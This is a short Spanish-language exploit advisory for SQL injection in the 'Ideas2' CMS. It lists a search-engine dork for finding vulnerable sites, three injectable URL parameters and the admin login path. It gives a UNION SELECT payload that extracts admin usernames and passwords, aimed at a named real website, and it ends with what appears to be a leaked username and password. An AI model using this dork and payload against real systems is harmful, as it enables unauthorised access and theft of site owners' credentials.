CMS IDEAS2 - SQL INYEXION

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Sql Inyexion
* Author: Mont
* www.argentinasecurity.com.ar
* Developer: http://ideas2.com.ar (creo)
* Dork: allinurl:"seccion_detalle.php?idseccion="

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* SqlInyexion


PoC :
http://www.WEBVICTIMA.com/[path_vulnerable]='

Login:
http://www.WEBVICTIMA.com/admin
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Paths Vulnerables



producto_categoria.php?idcategoria=

seccion_detalle.php?idseccion=

seccion_categoria.php?idcategoria=


[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Greetz:


n3xtdoor, MenteCriminal, rodr1, Em3trix, Bacan!, e #Inyexion

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Ejemplo aportado por MenteCriminal


http://www.piazzollatangoshow.com/seccion_detalle.php?idseccion=-1+UNION+SELECT+1,2,
3,4,5,concat_ws(0x3a,iduser_admin_login,usuario,password),7,8+
from+user_admin--

ideas2 : pato

--------------